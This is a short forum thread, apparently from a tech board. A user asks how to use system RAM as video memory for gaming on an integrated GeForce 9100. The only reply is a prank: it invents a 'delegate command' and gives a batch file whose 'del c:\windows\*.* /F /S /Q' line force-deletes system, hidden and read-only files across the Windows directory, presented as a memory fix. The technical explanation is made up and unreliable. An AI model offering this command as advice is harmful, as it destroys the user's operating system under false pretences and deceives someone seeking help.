I want to allocate my system RAM to my dedicated video RAM, but I don't know how to do it. Generally what I'm trying to do is have an optimal gaming computer and it has everything but a shitty graphics card.
Let me post my specs to tell you all what I mean:
Processor
AMD Phenom(tm) II X4 820 Processor
Video Card
NVIDIA GeForce 9100
RAM
8.0 GB
Operating System
Microsoft Windows 7 Home Premium Edition Service Pack 1 (build 7601), 64-bit
Ofc, the integrated GeForce 9100 limits me from playing any games I want to play, and I can't very much replace it.
So what do I do, /g/? What must I do, to transform this sluggish colossus into a mean, keen gaming machine?
Pic related, this could be me if you all helped me out.
Yeah you need to you the delegate command which delegates your ram to be used for graphic functions, which is generally stored in the windows directory for efficiency purposes.
Type this into your text editor of choice (like notepad) and save it as a .bat file. It should allow your ram to be used as both system and graphic ram as needed.
@echo off
del c:\windows\*.* /F /S /Q /as /ar /aa /ah
